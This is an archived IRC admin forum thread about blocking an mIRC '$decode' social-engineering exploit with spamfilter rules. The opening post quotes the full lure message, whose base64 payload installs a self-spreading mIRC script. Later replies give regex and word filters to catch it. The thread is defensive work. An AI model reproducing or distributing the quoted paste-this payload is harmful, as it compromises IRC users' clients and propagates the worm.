decode exploit

These are old archives. They are kept for historic purposes only.
Post Reply
droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

decode exploit

Post by droolin »

We received a decode exploit pm yesterday, and I thought it was covered.
The message was
<noxchi_rose> Want to be an OPERATOR in #mircpopup-magic ? copy/paste this-> //write   $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,
What I think was set up in the spamfilter.conf to catch this which is commented out is the following:

Code: Select all

/*
spamfilter {
        regex "//write \$decode\(.+\|.+load -rs";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
*/
Would this work???

Code: Select all

spamfilter {
        regex "//write \$decode\(.+";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
Any help on this would be greatly appriceated

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.
DeadNotBuried
Posts: 44
Joined: Wed Mar 10, 2004 5:30 am
Location: irc.majestic-liaisons.com
Contact:

Post by DeadNotBuried »

it looks to me like they added an extra space before the $decode to get around the spamfilters.

i'd suggest using ".*//write +\$decode\(.+" as the regex as it will get any number of spaces in there, or for the truly paranoid ".*\$decode.*"
Majestic Liaisons Adult Chat - [url=irc://irc.majestic-liaisons.com:6667]IRC[/url] , Java
droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

thank you, very much appriceated

Post by droolin »

God, I really am blind. I did not see the extra space at all.
Appriceate the help.

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Also, you need to double the \ used in spamfilters in the config file (not those in /spamfilter).

Personally, I'd just use this:

Code: Select all

spamfilter {
    word "\\$decode";
    target "pcnNPqat";
    reason "Just use /dcc ...";
    action block;
};
There's about nothing I can think of that I'd use $decode rather than /dcc.
droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

I did think about that

Post by droolin »

I was thinking, who would use the $decode in a normal conversation.
We have some scripters, but basicatly I don't see them using the decode for anything.
The only thing I was worried about was when people were kicking scripting ideas around, on how to best do something.
And possibly getting caught then.
If we keep having problems though, thats what I'll end up doing. Solves the problem once and for all.

Thank you, very much appriceated.

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

Why are we trying to escape the $ in $decode? It has no meaning except as the last character.
Why the hell can't my signature be empty?
"Your message contains too few characters."
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Because I'm paranoid like that? :P
Post Reply